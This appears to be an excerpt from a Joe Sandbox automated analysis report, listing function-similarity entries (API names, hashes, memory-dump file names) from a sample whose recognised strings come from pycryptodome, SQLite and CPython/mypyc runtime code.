                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 313767242-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2d534ef33d41ad631ae7cf13f553c24eca0aaf625a3a759915628b61016ee886
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C3161B2A05A8185EB618F71E8507EDB364FB44744F44803ADE5E476A5DF38D54CC714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$_wassert
                                                                                                                                                                                                                                                                                                  • String ID: D:\a\pycryptodome\pycryptodome\src\hash_SHA2_template.c$hs->curlen < BLOCK_SIZE
                                                                                                                                                                                                                                                                                                  • API String ID: 4178124637-3286700114
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c8687ad2ff289e94dcfd8a461612af8bd826b46b62f56cf6ff31f31de498083
                                                                                                                                                                                                                                                                                                  • Instruction ID: e0d5cd412fd1a3c9b41a7216672907778707e5931bdb087bc127bf8e6f657907
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c8687ad2ff289e94dcfd8a461612af8bd826b46b62f56cf6ff31f31de498083
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51C1B6A2E1968186E706CF38C9546F9E361FBA6788F00E335DF5D56A65EF38E581C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-463513059
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3e47f0c00916182eedab9697c5beae95e9754150ddc668738ca542d5120285b0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE15791B1E3C587DA0E8B39A811178BB94AB4EB80F58517ADE5E437D2DE3CB103D324
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4139299733-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 35a4b164d7d926b41929bb2b2ac8d3737955662c15fe271b4beba82657301c78
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e08353b1b5efed8d5a5d92c0060229a3045c5796905dc730b48f04b875b72da
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35a4b164d7d926b41929bb2b2ac8d3737955662c15fe271b4beba82657301c78
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE1AFF6E1A592C1EB268B29D4146B966A9FB41F94F1405B5FE4F83680DE3CF8438720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4186e42d9e154acb464bd7fad94ae323e595575bc9d2f8078817a1fa0583bf47
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80E1E0B2B0A781C6E7918E39D0487AD77A9FB4ABC4F008076EE4E87785DE3DD4468714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$DeallocObject_$Attr$Err_Unicode_$CompareType_Withstrcmp$Clear$AllocCalculateCallDictFastFromGenericMetaclassReadyTrueVectorcall
                                                                                                                                                                                                                                                                                                  • String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
                                                                                                                                                                                                                                                                                                  • API String ID: 3039355408-3015203947
                                                                                                                                                                                                                                                                                                  • Opcode ID: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 972cfd6818fbc9c3039f7ef094d2e8c7d3bfbdc1df2dbae1d9a6bb020b06354f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD14EB1A4BB4681EA569F7DED142B8A3B0BF55B84F44E039CE2E06271EF3CE5418300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_$Dict_Format$ItemString$DeallocErrorNextOccurredWith$EqualSliceTuple_Unicode_strchr
                                                                                                                                                                                                                                                                                                  • String ID: %.200s%s missing required argument '%s' (pos %d)$%.200s%s missing required keyword-only argument '%s'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%U' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%s') and position (%d)$at least$at most$exactly$function$keyword $keywords must be strings$this function
                                                                                                                                                                                                                                                                                                  • API String ID: 3559638176-2999033026
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f8ef507af8cc2a236b28dc01e6daa758a540280c688015cb7e3079141fe9442
                                                                                                                                                                                                                                                                                                  • Instruction ID: 710886c6c5974bd498e7cf7695acc493ec9ca52b12158a41ac442d1af1d22cab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f8ef507af8cc2a236b28dc01e6daa758a540280c688015cb7e3079141fe9442
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D63261B2A0AB8685EE628F69E8507A9B3B0FB45B84F54A039DE5D43774DF3CE444D700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_Format$DeallocDict_$ContainsItemSequence_Tuple_Unicode_
                                                                                                                                                                                                                                                                                                  • String ID: %.200s%s missing required argument '%U' (pos %d)$%.200s%s missing required keyword-only argument '%U'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%S' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%U') and position (%d)$at least$at most$exactly$function$keyword $this function
                                                                                                                                                                                                                                                                                                  • API String ID: 3590232122-3030676885
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                                                                                                  • Instruction ID: bb1e48d81341a4b2bd9e35446141e39f50e25dad8443bad3d9c2293ae83065b5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1124EB264AB4681EE528F69E8906B9B3B4FB44B84F44A03ADE5D43774DF3CE545C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Err_$Object_Vectorcall$ChainCode_ContainsDict_EmptyErrorExceptions1FetchFormatFrame_FromItemLong_MethodNumber_ObjectOccurredSet_Ssize_tState_SubtypeThreadType_With
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed$set$str$str or None
                                                                                                                                                                                                                                                                                                  • API String ID: 2120016896-82482222
                                                                                                                                                                                                                                                                                                  • Opcode ID: e10df2e8b84fc016c60972893c28a7248685ceeda9d69689395281560c33c246
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2103547beac271d8c040dd9f6ddec1f1c71a302cbd5729a8900d5bc5ff7d5f06
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e10df2e8b84fc016c60972893c28a7248685ceeda9d69689395281560c33c246
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC021FB1A4B60285EE569F79EC513B9A3B0FF44784F88E039DE6D066B5DE3EE4448700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_Vectorcall$Err_Method$ChainCode_EmptyExceptions1FetchFrame_FromLong_Number_Ssize_tState_Thread
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed$str
                                                                                                                                                                                                                                                                                                  • API String ID: 476165880-2613659865
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 77dcfb08927ab62c9b9fb09c5dc72d251dcb59d87bf8368f77f2c7b2a4482ec8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3023CB1A4B64281EA669F79EC513B9B3B1FF45784F88E039CE2D066B5DE3DE4448700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed$set
                                                                                                                                                                                                                                                                                                  • API String ID: 588643045-561237756
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
                                                                                                                                                                                                                                                                                                  • Instruction ID: a01ca7cb78431bdd4d1744ec6348f5b06d5a387038f1b72f971777bb90f76e4a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74D1FBB1A4AA0281EF629B7DEC513B5E3B1AF45B90F58E039CE2D066F5DE3DE4408710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strchr
                                                                                                                                                                                                                                                                                                  • String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
                                                                                                                                                                                                                                                                                                  • API String ID: 2830005266-262724644
                                                                                                                                                                                                                                                                                                  • Opcode ID: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a4f68406ce2e6d3ae55133db4364ea78c48588abc286ffef8110f20fcda7be8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 589183B1A0AA4282EF568B38E850278B7F4FB45B94F54A539CE6D47BB4DF3CE4519300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
                                                                                                                                                                                                                                                                                                  • String ID: __mro_entries__ must return a tuple
                                                                                                                                                                                                                                                                                                  • API String ID: 1865160900-2385075324
                                                                                                                                                                                                                                                                                                  • Opcode ID: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7888515668981f6560eeb9103636295281f99d68242993da521633e8505b23d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD5151B2A0A64286EF168F79ED24379A7B1BF46B85F08E035CE2D46674DF3DE4419300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
                                                                                                                                                                                                                                                                                                  • String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
                                                                                                                                                                                                                                                                                                  • API String ID: 2346549887-4201147154
                                                                                                                                                                                                                                                                                                  • Opcode ID: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
                                                                                                                                                                                                                                                                                                  • Instruction ID: 725668d5b473d381bfecb95f5dc22b25b0ecb4629cd994feca0654790ce20cab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D4127B1A1AA4282EA568F6AED54379B3B0BB44F94F44E039CE2D42B70DF3CE4458300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A3599
                                                                                                                                                                                                                                                                                                  • fprintf.MSPDB140-MSVCRT ref: 00007FFBAB6A35A9
